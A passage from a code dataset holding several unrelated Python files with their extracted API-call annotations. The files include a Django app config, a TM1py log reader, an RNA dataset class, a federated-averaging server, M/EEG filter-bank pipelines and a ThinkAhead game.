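    rule_filter = ConditionalRecipientRuleFilter(
        operator='equals', recipient_id='1', scope='tabs',
        tab_label='approve', tab_type='checkbox', value='true')
    print(rule_filter.to_dict())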
| [((243, 23, 243, 56), 'six.iteritems', 'six.iteritems', ({(243, 37, 243, 55): 'self.swagger_types'}, {}), '(self.swagger_types)', False, 'import six\n'), ((58, 29, 58, 44), 'docusign_esign.client.configuration.Configuration', 'Configuration', ({}, {}), '()', False, 'from docusign_esign.client.configuration import Configuration\n')] |
meshy/django-conman | conman/routes/apps.py | c739d09250d02d99068358e925ed8298a2a37a75 | from django.apps import AppConfig
from django.core.checks import register
from . import checks
class RouteConfig(AppConfig):
"""The AppConfig for conman routes."""
name = 'conman.routes'
def ready(self):
"""Register checks for conman routes."""
register(checks.polymorphic_installed)
register(checks.subclasses_available)
register(checks.subclasses_in_admin)
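# Typical wiring (an assumption following standard Django conventions): this
# config takes effect once 'conman.routes' is listed in INSTALLED_APPS, and
# ready() then hooks the checks into Django's system-check framework.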
| [((13, 8, 13, 46), 'django.core.checks.register', 'register', ({(13, 17, 13, 45): 'checks.polymorphic_installed'}, {}), '(checks.polymorphic_installed)', False, 'from django.core.checks import register\n'), ((14, 8, 14, 45), 'django.core.checks.register', 'register', ({(14, 17, 14, 44): 'checks.subclasses_available'}, {}), '(checks.subclasses_available)', False, 'from django.core.checks import register\n'), ((15, 8, 15, 44), 'django.core.checks.register', 'register', ({(15, 17, 15, 43): 'checks.subclasses_in_admin'}, {}), '(checks.subclasses_in_admin)', False, 'from django.core.checks import register\n')] |
DJHig/TM1py-samples | Other/transactionlog entries since timestamp.py | da4050380447472a02e2a107a2c5be79ac284d0a | """
Get all TM1 transactions for all cubes starting to a specific date.
"""
import configparser
config = configparser.ConfigParser()
config.read(r'..\config.ini')  # raw string avoids the invalid-escape warning
from datetime import datetime
from TM1py.Services import TM1Service
with TM1Service(**config['tm1srv01']) as tm1:
# Timestamp for Message-Log parsing
timestamp = datetime(year=2018, month=2, day=15, hour=16, minute=2, second=0)
# Get all entries since timestamp
entries = tm1.server.get_transaction_log_entries(since=timestamp)
# loop through entries
for entry in entries:
# Do stuff
print(entry['TimeStamp'], entry)
| [((6, 9, 6, 36), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((14, 5, 14, 37), 'TM1py.Services.TM1Service', 'TM1Service', ({}, {}), "(**config['tm1srv01'])", False, 'from TM1py.Services import TM1Service\n'), ((17, 16, 17, 81), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import datetime\n')] |
AviranLab/patteRNA | src/patteRNA/Dataset.py | 88b900844016717a71b6ec8e4f2d10d8888600ce | import logging
import numpy as np
from scipy.stats import entropy
from patteRNA.Transcript import Transcript
from patteRNA import filelib
logger = logging.getLogger(__name__)
class Dataset:
def __init__(self, fp_observations, fp_sequences=None, fp_references=None):
self.fp_obs = fp_observations
self.fp_fasta = fp_sequences
self.fp_refs = fp_references
self.rnas = dict()
self.stats = dict()
def load_rnas(self, log_flag=False):
observations_dict = filelib.parse_observations(self.fp_obs)
observations_rnas = set(observations_dict.keys())
dataset_rnas = observations_rnas
sequences_dict = None
if self.fp_fasta:
sequences_dict = filelib.parse_fasta(self.fp_fasta)
sequences_rnas = set(sequences_dict.keys())
# Cross reference input files to confirm all transcripts
for rna in observations_rnas.difference(sequences_rnas):
print('WARNING - No sequence found for RNA: {}'.format(rna))
sequences_dict[rna] = ''.join(['N'] * len(observations_dict[rna]))
for rna in sequences_rnas.difference(observations_rnas):
print('WARNING - No probing data found for RNA: {}'.format(rna))
observations_dict[rna] = np.tile(np.nan, len(sequences_dict[rna]))
dataset_rnas.update(sequences_rnas)
for rna_name in dataset_rnas:
if self.fp_fasta:
self.rnas[rna_name] = Transcript(rna_name, sequences_dict[rna_name], observations_dict[rna_name])
else:
self.rnas[rna_name] = Transcript(rna_name, 'N' * len(observations_dict[rna_name]),
observations_dict[rna_name])
if log_flag:
for rna in self.rnas:
self.rnas[rna].log_transform()
self.compute_stats()
def compute_stats(self):
"""
Parse all finite observations in the input file and compute some statistics on the data.
These statistics are mostly used to initialize parameters of the emission model before training.
"""
finite_obs = []
total_obs = 0
up_ref = 0
p_ref = 0
for rna in self.rnas:
finite_obs.extend(self.rnas[rna].obs[np.isfinite(self.rnas[rna].obs)])
total_obs += len(self.rnas[rna].obs)
up_ref += int(np.sum(self.rnas[rna].ref == 0))
p_ref += int(np.sum(self.rnas[rna].ref == 1))
self.stats['quantile_basis'] = np.linspace(0, 1, 1000)
self.stats['quantiles'] = np.quantile(finite_obs, self.stats["quantile_basis"])
self.stats['P25'], self.stats['P75'] = np.percentile(finite_obs, (25, 75))
self.stats['P40'], self.stats['P60'] = np.percentile(finite_obs, (40, 60))
self.stats['n_obs'] = len(finite_obs)
self.stats['up_ref'] = up_ref
self.stats['p_ref'] = p_ref
self.stats['total_obs'] = total_obs
self.stats['continuous_variance'] = np.var(finite_obs)
self.stats['minimum'] = np.min(finite_obs)
self.stats['maximum'] = np.max(finite_obs)
self.stats['finite_obs'] = finite_obs
self.stats['histogram_bins'] = np.linspace(self.stats['minimum'], self.stats['maximum'], 20)
self.stats['histogram'], _ = np.histogram(finite_obs,
bins=self.stats['histogram_bins'],
density=True)
def spawn_training_set(self, kl_div):
"""
        Spawn a training set (smaller than or equal in size to the overall data) based on KL divergence criteria.
Transcripts are incrementally added to a training Dataset (high quality transcripts first) until
the training set's KL divergence from the overall data falls below the provided threshold.
"""
training_transcripts = []
training_obs = []
kl_div_set = 1.0
group_size = 20
logger.info(' ... sorting')
rnas_sd = sorted(self.rnas.values(), key=lambda transcript: transcript.density, reverse=True)
logger.info(' ... selecting')
while kl_div_set > kl_div and rnas_sd:
rnas = rnas_sd[:group_size]
rnas_sd[:group_size] = []
for rna in rnas:
training_transcripts.append(rna.name)
training_obs.extend(rna.obs[rna.mask_finite])
training_histogram, _ = np.histogram(training_obs,
bins=self.stats['histogram_bins'],
density=True)
kl_div_set = entropy(training_histogram, self.stats['histogram'])
training_set = self.spawn_set(rnas=training_transcripts)
training_set.compute_stats()
return training_set, kl_div_set
def pre_process(self, model, scoring=False):
if model.emission_model.type == 'DOM':
for rna in self.rnas:
model.emission_model.discretize(self.rnas[rna])
if scoring:
for rna in self.rnas.values():
model.e_step(rna)
rna.compute_log_B_ratios()
def get_emissions(self, model):
for rna in self.rnas:
model.emission_model.compute_emissions(self.rnas[rna])
def spawn_set(self, rnas):
spawned_set = Dataset(fp_observations=None, fp_sequences=None, fp_references=None)
spawned_set.rnas = {rna: self.rnas[rna] for rna in rnas}
return spawned_set
def spawn_reference_set(self):
spawned_set = Dataset(fp_observations=None, fp_references=None, fp_sequences=None)
references = [rna for rna in self.rnas if self.rnas[rna].ref is not None]
spawned_set.rnas = {rna: self.rnas[rna] for rna in references}
spawned_set.compute_stats()
return spawned_set
def clear(self):
self.rnas = None
self.stats = None
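# ---------------------------------------------------------------------------
# Minimal usage sketch (hypothetical file paths; not part of the original
# module). filelib is expected to parse the probing data and the FASTA file.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    dataset = Dataset(fp_observations='profiles.shape',
                      fp_sequences='transcripts.fasta')
    dataset.load_rnas(log_flag=False)
    training_set, kl = dataset.spawn_training_set(kl_div=0.01)
    print('training-set KL divergence: {:.4f}'.format(kl))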
| [((7, 9, 7, 36), 'logging.getLogger', 'logging.getLogger', ({(7, 27, 7, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((20, 28, 20, 67), 'patteRNA.filelib.parse_observations', 'filelib.parse_observations', ({(20, 55, 20, 66): 'self.fp_obs'}, {}), '(self.fp_obs)', False, 'from patteRNA import filelib\n'), ((72, 39, 72, 62), 'numpy.linspace', 'np.linspace', ({(72, 51, 72, 52): '0', (72, 54, 72, 55): '1', (72, 57, 72, 61): '1000'}, {}), '(0, 1, 1000)', True, 'import numpy as np\n'), ((73, 34, 73, 87), 'numpy.quantile', 'np.quantile', ({(73, 46, 73, 56): 'finite_obs', (73, 58, 73, 86): "self.stats['quantile_basis']"}, {}), "(finite_obs, self.stats['quantile_basis'])", True, 'import numpy as np\n'), ((74, 47, 74, 82), 'numpy.percentile', 'np.percentile', ({(74, 61, 74, 71): 'finite_obs', (74, 73, 74, 81): '(25, 75)'}, {}), '(finite_obs, (25, 75))', True, 'import numpy as np\n'), ((75, 47, 75, 82), 'numpy.percentile', 'np.percentile', ({(75, 61, 75, 71): 'finite_obs', (75, 73, 75, 81): '(40, 60)'}, {}), '(finite_obs, (40, 60))', True, 'import numpy as np\n'), ((80, 44, 80, 62), 'numpy.var', 'np.var', ({(80, 51, 80, 61): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((81, 32, 81, 50), 'numpy.min', 'np.min', ({(81, 39, 81, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((82, 32, 82, 50), 'numpy.max', 'np.max', ({(82, 39, 82, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((84, 39, 84, 100), 'numpy.linspace', 'np.linspace', ({(84, 51, 84, 72): "self.stats['minimum']", (84, 74, 84, 95): "self.stats['maximum']", (84, 97, 84, 99): '20'}, {}), "(self.stats['minimum'], self.stats['maximum'], 20)", True, 'import numpy as np\n'), ((85, 37, 87, 63), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((27, 29, 27, 63), 'patteRNA.filelib.parse_fasta', 'filelib.parse_fasta', ({(27, 49, 27, 62): 'self.fp_fasta'}, {}), '(self.fp_fasta)', False, 'from patteRNA import filelib\n'), ((113, 36, 115, 62), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((116, 25, 116, 77), 'scipy.stats.entropy', 'entropy', ({(116, 33, 116, 51): 'training_histogram', (116, 53, 116, 76): "self.stats['histogram']"}, {}), "(training_histogram, self.stats['histogram'])", False, 'from scipy.stats import entropy\n'), ((43, 38, 43, 113), 'patteRNA.Transcript.Transcript', 'Transcript', ({(43, 49, 43, 57): 'rna_name', (43, 59, 43, 83): 'sequences_dict[rna_name]', (43, 85, 43, 112): 'observations_dict[rna_name]'}, {}), '(rna_name, sequences_dict[rna_name], observations_dict[rna_name])', False, 'from patteRNA.Transcript import Transcript\n'), ((69, 26, 69, 57), 'numpy.sum', 'np.sum', ({(69, 33, 69, 56): '(self.rnas[rna].ref == 0)'}, {}), '(self.rnas[rna].ref == 0)', True, 'import numpy as np\n'), ((70, 25, 70, 56), 'numpy.sum', 'np.sum', ({(70, 32, 70, 55): '(self.rnas[rna].ref == 1)'}, {}), '(self.rnas[rna].ref == 1)', True, 'import numpy as np\n'), ((67, 49, 67, 80), 'numpy.isfinite', 'np.isfinite', ({(67, 61, 67, 79): 'self.rnas[rna].obs'}, {}), '(self.rnas[rna].obs)', True, 'import numpy as np\n')] |
GYRY-NEU/CS7610-Experiments | src/Simulation/developer_0/main.py | 3731b45c4a9cba2a1d7e44d37f28d1046a38de47 | import library
import json
@library.export
def init(args):
model = [[9.2, 0.21, 0.21],
[8.2, 0.22, 0.21],
[7.2, 1.21, 2.41],
[1.2, 2.21, 0.29]]
library.put("model", model)
ROUND = 0
library.put("ROUND", ROUND)
alpha = 0.2
library.put("alpha", alpha)
@library.export
def clientUpload(args):
# get client model
client = json.loads(args["data"])
# client round
k = "round" + str(client["round"])
# save model to buckets
library.put_bucket(k, client["model"])
    # if enough models are buffered (more than 20)
if library.count_bucket(k) > 20:
ROUND = library.get("ROUND")
# check client rounds == current rounds
if ROUND != client["round"]:
return False
# set round to -1 to prevent clients uploading to this bucket
library.put("ROUND", -1)
model = library.get("model")
list_weights = library.get_bucket(k)
model = updateModel(model, list_weights)
# save calculated model and restore round
library.put("model", model)
library.put("ROUND", ROUND+1)
return True
def updateModel(model, list_weights):
"""
list_weights : 3D list of shape : (clientNumber,modelOuter, modelInner)
It contains all the models for each client
"""
# this part will change developer to developer
# one can just take avg
# or one can discard smallest and largest than take average
# this example just takes avg without use of external library
alpha = library.get("alpha")
# getting shape of 3D array
number_clients = len(list_weights)
size_outer = len(list_weights[0])
size_inner = len(list_weights[0][0])
# constructing a new 2D array of zeros of same size
newModel = [ [0 for j in range(size_inner)] for i in range(size_outer)]
# validate new created shape
assert(len(newModel) == size_outer)
assert(len(newModel[0]) == size_inner)
# sum for all the clients
for weights in list_weights:
for outerIndex, outerList in enumerate(weights):
for innerIndex, innerVal in enumerate(outerList):
newModel[outerIndex][innerIndex] += innerVal
# average it by number of clients
for outerIndex, outerList in enumerate(newModel):
for innerIndex, innerVal in enumerate(outerList):
newModel[outerIndex][innerIndex] /= number_clients
    # now update the model using the learning rate, following the formula
    #   model = (1 - a) * model + a * new_model
    # The previous and next loops could be merged for efficiency, but they
    # are kept separate for readability.
# Iterate over model
for outerIndex, outerList in enumerate(newModel):
for innerIndex, innerVal in enumerate(outerList):
model[outerIndex][innerIndex] *= 1-alpha
model[outerIndex][innerIndex] += alpha * newModel[outerIndex][innerIndex]
# Finally update round number
return model
@library.export
def getModel(args):
return library.get("model")
@library.export
def getRound(args):
return library.get("ROUND")
| [((10, 4, 10, 31), 'library.put', 'library.put', ({(10, 16, 10, 23): '"""model"""', (10, 25, 10, 30): 'model'}, {}), "('model', model)", False, 'import library\n'), ((12, 4, 12, 31), 'library.put', 'library.put', ({(12, 16, 12, 23): '"""ROUND"""', (12, 25, 12, 30): 'ROUND'}, {}), "('ROUND', ROUND)", False, 'import library\n'), ((14, 4, 14, 31), 'library.put', 'library.put', ({(14, 16, 14, 23): '"""alpha"""', (14, 25, 14, 30): 'alpha'}, {}), "('alpha', alpha)", False, 'import library\n'), ((19, 13, 19, 37), 'json.loads', 'json.loads', ({(19, 24, 19, 36): "args['data']"}, {}), "(args['data'])", False, 'import json\n'), ((25, 4, 25, 42), 'library.put_bucket', 'library.put_bucket', ({(25, 23, 25, 24): 'k', (25, 26, 25, 41): "client['model']"}, {}), "(k, client['model'])", False, 'import library\n'), ((59, 12, 59, 32), 'library.get', 'library.get', ({(59, 24, 59, 31): '"""alpha"""'}, {}), "('alpha')", False, 'import library\n'), ((100, 11, 100, 31), 'library.get', 'library.get', ({(100, 23, 100, 30): '"""model"""'}, {}), "('model')", False, 'import library\n'), ((104, 11, 104, 31), 'library.get', 'library.get', ({(104, 23, 104, 30): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((28, 7, 28, 30), 'library.count_bucket', 'library.count_bucket', ({(28, 28, 28, 29): 'k'}, {}), '(k)', False, 'import library\n'), ((29, 16, 29, 36), 'library.get', 'library.get', ({(29, 28, 29, 35): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((36, 8, 36, 32), 'library.put', 'library.put', ({(36, 20, 36, 27): '"""ROUND"""', (36, 29, 36, 31): '(-1)'}, {}), "('ROUND', -1)", False, 'import library\n'), ((38, 16, 38, 36), 'library.get', 'library.get', ({(38, 28, 38, 35): '"""model"""'}, {}), "('model')", False, 'import library\n'), ((40, 23, 40, 44), 'library.get_bucket', 'library.get_bucket', ({(40, 42, 40, 43): 'k'}, {}), '(k)', False, 'import library\n'), ((44, 8, 44, 35), 'library.put', 'library.put', ({(44, 20, 44, 27): '"""model"""', (44, 29, 44, 34): 'model'}, {}), "('model', model)", False, 'import library\n'), ((45, 8, 45, 37), 'library.put', 'library.put', ({(45, 20, 45, 27): '"""ROUND"""', (45, 29, 45, 36): '(ROUND + 1)'}, {}), "('ROUND', ROUND + 1)", False, 'import library\n')] |
ragingpastry/molecule-ignite | molecule_ignite/test/unit/test_driver.py | aaf005cabba9a8c933191458cf8553da9bac581d | from molecule import api
def test_driver_is_detected():
driver_name = __name__.split(".")[0].split("_")[-1]
assert driver_name in [str(d) for d in api.drivers()]
| [((6, 43, 6, 56), 'molecule.api.drivers', 'api.drivers', ({}, {}), '()', False, 'from molecule import api\n')] |
dengemann/meegpowreg | coffeine/pipelines.py | e9cc8f2372f8b8ef4b372bfea113ed0b9646cb39 | import numpy as np
from coffeine.covariance_transformers import (
Diag,
LogDiag,
ExpandFeatures,
Riemann,
RiemannSnp,
NaiveVec)
from coffeine.spatial_filters import (
ProjIdentitySpace,
ProjCommonSpace,
ProjLWSpace,
ProjRandomSpace,
ProjSPoCSpace)
from sklearn.compose import make_column_transformer
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import RidgeCV, LogisticRegression
def make_filter_bank_transformer(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None):
"""Generate pipeline for filterbank models.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
covarances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
we recommend comparing `riemann', `spoc' and `diag' as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
        *NeuroImage*, page 116893, 2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
# put defaults here for projection and vectorization step
projection_defaults = {
'riemann': dict(scale=1, n_compo='full', reg=1.e-05),
'lw_riemann': dict(shrink=1),
'diag': dict(),
'log_diag': dict(),
'random': dict(n_compo='full'),
'naive': dict(),
'spoc': dict(n_compo='full', scale='auto', reg=1.e-05, shrink=1),
'riemann_wasserstein': dict()
}
vectorization_defaults = {
'riemann': dict(metric='riemann'),
'lw_riemann': dict(metric='riemann'),
'diag': dict(),
'log_diag': dict(),
'random': dict(),
'naive': dict(method='upper'),
'spoc': dict(),
'riemann_wasserstein': dict(rank='full')
}
assert set(projection_defaults) == set(vectorization_defaults)
if method not in projection_defaults:
raise ValueError(
f"The `method` ('{method}') you specified is unknown.")
# update defaults
projection_params_ = projection_defaults[method]
if projection_params is not None:
projection_params_.update(**projection_params)
vectorization_params_ = vectorization_defaults[method]
if vectorization_params is not None:
vectorization_params_.update(**vectorization_params)
def _get_projector_vectorizer(projection, vectorization):
        return [(make_pipeline(projection(**projection_params_),
                               vectorization(**vectorization_params_)),
                 name)
                for name in names]
# setup pipelines (projection + vectorization step)
steps = tuple()
if method == 'riemann':
steps = (ProjCommonSpace, Riemann)
elif method == 'lw_riemann':
steps = (ProjLWSpace, Riemann)
elif method == 'diag':
steps = (ProjIdentitySpace, Diag)
elif method == 'log_diag':
steps = (ProjIdentitySpace, LogDiag)
elif method == 'random':
steps = (ProjRandomSpace, LogDiag)
elif method == 'naive':
steps = (ProjIdentitySpace, NaiveVec)
elif method == 'spoc':
steps = (ProjSPoCSpace, LogDiag)
elif method == 'riemann_wasserstein':
steps = (ProjIdentitySpace, RiemannSnp)
filter_bank_transformer = make_column_transformer(
*_get_projector_vectorizer(*steps), remainder='passthrough')
if categorical_interaction is not None:
filter_bank_transformer = ExpandFeatures(
filter_bank_transformer, expander_column=categorical_interaction)
return filter_bank_transformer
def make_filter_bank_regressor(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None, scaling=None,
estimator=None):
"""Generate pipeline for regression with filter bank model.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
        covariances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
        we recommend comparing ``'riemann'``, ``'spoc'`` and ``'diag'`` as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
scaling : scikit-learn Transformer object | None
        Method for re-scaling the features. Defaults to None. If None,
StandardScaler is used.
estimator : scikit-learn Estimator object.
The estimator object. Defaults to None. If None, RidgeCV
is performed with default values.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
        *NeuroImage*, page 116893, 2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
filter_bank_transformer = make_filter_bank_transformer(
names=names, method=method, projection_params=projection_params,
vectorization_params=vectorization_params,
categorical_interaction=categorical_interaction
)
scaling_ = scaling
if scaling_ is None:
scaling_ = StandardScaler()
estimator_ = estimator
if estimator_ is None:
estimator_ = RidgeCV(alphas=np.logspace(-3, 5, 100))
filter_bank_regressor = make_pipeline(
filter_bank_transformer,
scaling_,
estimator_
)
return filter_bank_regressor
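def _demo_filter_bank_regressor():
    """Illustrative sketch (added for clarity; not part of the original API).

    Builds the input convention described in the docstring above, where each
    cell of the columns listed in ``names`` holds one covariance matrix, then
    fits the pipeline. The band names and random data are hypothetical.
    """
    import pandas as pd
    rng = np.random.RandomState(42)
    n_subjects, n_channels = 10, 4

    def random_spd():
        # random symmetric positive-definite matrix, well conditioned
        a = rng.randn(n_channels, n_channels)
        return a @ a.T + n_channels * np.eye(n_channels)

    X = pd.DataFrame({'alpha': [random_spd() for _ in range(n_subjects)],
                      'beta': [random_spd() for _ in range(n_subjects)]})
    y = rng.randn(n_subjects)
    model = make_filter_bank_regressor(names=['alpha', 'beta'],
                                       method='riemann')
    model.fit(X, y)
    return model.predict(X)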
def make_filter_bank_classifier(names, method='riemann',
projection_params=None,
vectorization_params=None,
categorical_interaction=None, scaling=None,
estimator=None):
"""Generate pipeline for classification with filter bank model.
Prepare filter bank models as used in [1]_. These models take as input
sensor-space covariance matrices computed from M/EEG signals in different
frequency bands. Then transformations are applied to improve the
applicability of linear regression techniques by reducing the impact of
field spread.
In terms of implementation, this involves 1) projection
(e.g. spatial filters) and 2) vectorization (e.g. taking the log on the
diagonal).
.. note::
The resulting model expects as inputs data frames in which different
        covariances (e.g. for different frequencies) are stored inside columns
indexed by ``names``.
Other columns will be passed through by the underlying column
transformers.
The pipeline also supports fitting categorical interaction effects
after projection and vectorization steps are performed.
.. note::
All essential methods from [1]_ are implemented here. In practice,
        we recommend comparing ``'riemann'``, ``'spoc'`` and ``'diag'`` as a baseline.
Parameters
----------
names : list of str
The column names of the data frame corresponding to different
covariances.
method : str
The method used for extracting features from covariances. Defaults
to ``'riemann'``. Can be ``'riemann'``, ``'lw_riemann'``, ``'diag'``,
``'log_diag'``, ``'random'``, ``'naive'``, ``'spoc'``,
``'riemann_wasserstein'``.
projection_params : dict | None
The parameters for the projection step.
vectorization_params : dict | None
The parameters for the vectorization step.
categorical_interaction : str
The column in the input data frame containing a binary descriptor
used to fit 2-way interaction effects.
scaling : scikit-learn Transformer object | None
        Method for re-scaling the features. Defaults to None. If None,
StandardScaler is used.
estimator : scikit-learn Estimator object.
The estimator object. Defaults to None. If None, LogisticRegression
is performed with default values.
References
----------
[1] D. Sabbagh, P. Ablin, G. Varoquaux, A. Gramfort, and D.A. Engemann.
Predictive regression modeling with MEG/EEG: from source power
to signals and cognitive states.
        *NeuroImage*, page 116893, 2020. ISSN 1053-8119.
https://doi.org/10.1016/j.neuroimage.2020.116893
"""
filter_bank_transformer = make_filter_bank_transformer(
names=names, method=method, projection_params=projection_params,
vectorization_params=vectorization_params,
categorical_interaction=categorical_interaction
)
scaling_ = scaling
if scaling_ is None:
scaling_ = StandardScaler()
estimator_ = estimator
if estimator_ is None:
estimator_ = LogisticRegression(solver='liblinear')
    filter_bank_classifier = make_pipeline(
        filter_bank_transformer,
        scaling_,
        estimator_
    )
    return filter_bank_classifier
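def _demo_filter_bank_classifier():
    """Companion sketch to the regressor demo above (illustrative only; the
    band name and binary labels are made up)."""
    import pandas as pd
    rng = np.random.RandomState(0)
    covs = []
    for _ in range(20):
        a = rng.randn(4, 4)
        covs.append(a @ a.T + 4 * np.eye(4))  # one SPD covariance per subject
    X = pd.DataFrame({'alpha': covs})
    y = rng.randint(0, 2, size=20)
    clf = make_filter_bank_classifier(names=['alpha'], method='log_diag')
    clf.fit(X, y)
    return clf.predict(X)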
| [((233, 28, 237, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(234, 8, 234, 31): 'filter_bank_transformer', (235, 8, 235, 16): 'scaling_', (236, 8, 236, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((321, 28, 325, 5), 'sklearn.pipeline.make_pipeline', 'make_pipeline', ({(322, 8, 322, 31): 'filter_bank_transformer', (323, 8, 323, 16): 'scaling_', (324, 8, 324, 18): 'estimator_'}, {}), '(filter_bank_transformer, scaling_, estimator_)', False, 'from sklearn.pipeline import make_pipeline\n'), ((148, 34, 149, 77), 'coffeine.covariance_transformers.ExpandFeatures', 'ExpandFeatures', (), '', False, 'from coffeine.covariance_transformers import Diag, LogDiag, ExpandFeatures, Riemann, RiemannSnp, NaiveVec\n'), ((227, 19, 227, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((315, 19, 315, 35), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ({}, {}), '()', False, 'from sklearn.preprocessing import StandardScaler\n'), ((319, 21, 319, 59), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import RidgeCV, LogisticRegression\n'), ((231, 36, 231, 59), 'numpy.logspace', 'np.logspace', ({(231, 48, 231, 50): '-3', (231, 52, 231, 53): '5', (231, 55, 231, 58): '100'}, {}), '(-3, 5, 100)', True, 'import numpy as np\n')] |
dysomni/aima-python | submissions/Chouard/mygames.py | c67104e50007ec5ac2a9aa37f0cb972cb6315528 | from games import Game
from math import nan, isnan
from queue import PriorityQueue
from copy import deepcopy
from utils import isnumber
from grading.util import print_table
class GameState:
def __init__(self, to_move, position, board, label=None):
self.to_move = to_move
self.position = position
self.board = board
self.label = label
self.scores = {'H': 0, 'V': 0}
def __str__(self):
        if self.label is None:
return super(GameState, self).__str__()
return self.label
class Move:
def __init__(self, r, c, v):
self.row = r
self.col = c
self.value = v
def rcv(self):
return self.row, self.col, self.value
    def __lt__(self, other):
        # reversed so that PriorityQueue pops the highest-value move first
        return self.value > other.value
def q2list(mq):
    """Drain a priority queue of Moves into a list of (row, col, value) tuples."""
    moves = []
    while not mq.empty():
        moves.append(mq.get().rcv())
    return moves
def movesInRow(board, r):
mQueue = PriorityQueue()
row = board[r]
for c in range(len(row)):
if isnan(row[c]):
continue
v = row[c]
move = Move(r, c, v)
mQueue.put(move)
return q2list(mQueue)
def movesInCol(board, c):
mQueue = PriorityQueue()
for r in range(len(board)):
if isnan(board[r][c]):
continue
v = board[r][c]
move = Move(r, c, v)
mQueue.put(move)
return q2list(mQueue)
class ThinkAhead(Game):
"""
An implementation of ThinkAhead
"""
def __init__(self, state):
self.initial = state
def actions(self, state):
"Legal moves are any square not yet taken."
r, c = state.position
if state.to_move == 'H':
moves = movesInRow(state.board, r)
return moves
if state.to_move == 'V':
moves = movesInCol(state.board, c)
return moves
return []
# defines the order of play
def opponent(self, player):
if player == 'H':
return 'V'
if player == 'V':
return 'H'
return None
def result(self, state, move):
r, c, v = move
assert state.board[r][c] == v
currMover = state.to_move
nextMover = self.opponent(currMover)
newState = deepcopy(state)
newState.to_move = nextMover
newState.position = r, c
newState.board[r][c] = nan
newState.scores[currMover] += v
return newState
def utility(self, state, player):
"Player relative score"
opponent = self.opponent(player)
return state.scores[player] - state.scores[opponent]
def terminal_test(self, state):
"A state is terminal if it is won or there are no empty squares."
return len(self.actions(state)) == 0
def display(self, state):
print_table(state.board, njust='center', sep=',')
print('Score: ' + str(state.scores))
won = GameState(
to_move='H',
position=(0, 1),
board=[[nan, nan],
[9, nan]],
label='won'
)
won.scores = {'H': 9, 'V': 0}
lost = GameState(
to_move='V',
position=(0, 1),
board=[[nan, nan],
[9, nan]],
label='lost'
)
lost.scores = {'H': 0, 'V': 9}
winin1 = GameState(
to_move='H',
position=(1, 1),
board=[[nan, nan],
[9, nan]],
label='winin1'
)
losein1 = GameState(
to_move='V',
position=(0, 0),
board=[[nan, nan],
[9, nan]],
label='losein1'
)
winin2 = GameState(
to_move='H',
position=(0, 0),
board=[[nan, 3, 2],
[nan, 9, nan],
[nan, nan, 1]],
label='winin2'
)
losein2 = GameState(
to_move='V',
position=(0, 0),
